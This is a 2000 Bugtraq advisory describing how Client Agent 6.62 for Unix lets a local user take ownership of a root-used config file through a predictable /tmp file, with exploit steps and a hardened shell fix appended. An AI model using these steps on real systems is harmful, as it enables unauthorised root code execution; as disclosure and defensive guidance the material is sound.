[16018] in bugtraq
Client Agent 6.62 for Unix Vulnerability
daemon@ATHENA.MIT.EDU (zorgon@SDF.FREESHELL.ORG)
Mon Jul 31 13:05:37 2000
Message-Id:  <20000728034420.A19824@sdf.freeshell.org>
Date:         Fri, 28 Jul 2000 03:44:20 +0000
Reply-To: zorgon@SDF.FREESHELL.ORG
From: zorgon@SDF.FREESHELL.ORG
To: BUGTRAQ@SECURITYFOCUS.COM
Hi all,
Excuse me for my poor English :)
I discovered a vulnerability in Client Agent 6.62 for Unix.
It was tested on a Debian 2.2.14.
Perhaps it isn't important.
Introduction
--------------
Client Agent has a hole that allows arbitrary code to be executed by root
without root's knowledge. However, some conditions are necessary to
exploit this vulnerability.
Description
------------
Client Agent is used with ARCserveIT, the backup software. It must be installed
on all the workstations. A global configuration file, agent.cfg, keeps track of every
sub-agent installed on your system. This file is in /usr/CYEagent, and receives
the information from the sub-agent when the script /opt/uagent/uagentsetup is run.
agent.cfg:
debian:/usr/CYEagent# more agent.cfg
#
#(c) Copyright 1989-1999 Computer Associates International, Inc.
#and/or its subsidiaries. All Rights Reserved. Use by the United
#States Government is subject to RESTRICTED RIGHTS as set out in
#the license agreement.
#
[0]
#[UAGENT]
NAME    Uagent
VERSION 5.0.0
HOME    /opt/uagent
#ENV     CHEY_ENV_DEBUG_LEVEL=4
ENV     LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
ENV     SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
ENV     LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
BROWSER asbr
AGENT   uagentd
MERGE   umrgd
VERIFY  umrgd
where asbr, uagentd, and umrgd are programs in /opt/uagent.
Client Agent is vulnerable only if uagentsetup is run a second time. The first time,
it creates the folder /usr/CYEagent and the file agent.cfg, but afterwards it creates
a backup of agent.cfg and creates a new agent.cfg without checking permissions.
The code in /opt/uagent/uagentsetup :
# append lines
#
case $ANS in
  y|Y|yes|YES|Yes)
        cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
        ${ECHO} >> ${TMPFILE} || exit 2
        mv ${TMPFILE} $dest || exit 2      <------------
        ;;
esac
So anyone can control this file. The modifications to this file will be used when
the sub-agent is stopped and restarted.
Exploit
--------
[zorgon@debian /]$ cd /tmp
[zorgon@debian /tmp]$ touch uagent.tmp
[zorgon@debian /tmp]$ chmod 700 uagent.tmp
If uagentsetup is run a second time :
[zorgon@debian /]$ ls -lag /usr/CYEagent/
total 176
drwxr-xr-x    3 root     root         4096 Jul 19 17:46 .
drwxr-xr-x   15 root     root         4096 Jul 11 10:37 ..
-rw-r--r--    1 zorgon   users         618 Jul 19 17:47 agent.cfg
-rw-r--r--    1 root     root          618 Jul 19 17:47 agent.cfg.old
-rwxr-xr-x    1 root     root        16899 Jul 11 10:37 asagent
-rwxr-xr-x    1 root     root       105280 Jul 11 10:37 asagentd
lrwxrwxrwx    1 root     root           11 Jul 12 10:54 li -> /usr/lib/li
-rwxr-xr-x    1 root     root        27878 Jul 19 17:47 libarclic98_api.so
drwxr-xr-x    3 root     root         4096 Jul 11 10:37 nls
[zorgon@debian /]$
--
zorgon@sdf.lonestar.org
Web Site : http://www.nightbird.fr.st
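
A hardened form of the append-and-move step quoted from uagentsetup, together with an ownership check for agent.cfg, as an added example that is not part of the original post and not the vendor's code. It assumes, from the Exploit section, that ${TMPFILE} is the fixed path /tmp/uagent.tmp; the function names install_cfg and cfg_is_trusted are hypothetical.

```shell
#!/bin/sh
# Added example, not vendor code. Function names are hypothetical.

# install_cfg SRC DEST
# Build the new DEST (old DEST followed by SRC) in a temp file that is
# created exclusively, with a random name, inside DEST's own directory.
# A file pre-created under a predictable name in /tmp is never reused,
# so its owner and mode cannot carry over to DEST.
install_cfg() {
    src=$1
    dest=$2
    destdir=$(dirname "$dest")
    old_umask=$(umask)
    umask 077
    tmp=$(mktemp "$destdir/.agent.cfg.XXXXXX") || { umask "$old_umask"; return 2; }
    umask "$old_umask"
    { [ ! -f "$dest" ] || cat "$dest"; } > "$tmp" &&
        cat "$src" >> "$tmp" &&
        chmod 644 "$tmp" &&
        mv -f "$tmp" "$dest" || { rm -f "$tmp"; return 2; }
}

# cfg_is_trusted FILE OWNER_UID
# Succeeds only if FILE is a regular file (not a symlink), is owned by
# OWNER_UID, and is not writable by group or others. Run it before the
# agent is restarted; for /usr/CYEagent/agent.cfg the expected uid is 0.
cfg_is_trusted() {
    f=$1
    want=$2
    [ -f "$f" ] && [ ! -L "$f" ] || return 1
    uid=$(ls -ln "$f" | awk '{print $3}')
    [ "$uid" = "$want" ] || return 1
    [ -z "$(find "$f" -prune \( -perm -020 -o -perm -002 \))" ]
}
```

On an affected host, `cfg_is_trusted /usr/CYEagent/agent.cfg 0` fails for the listing shown above, because agent.cfg is owned by zorgon rather than root.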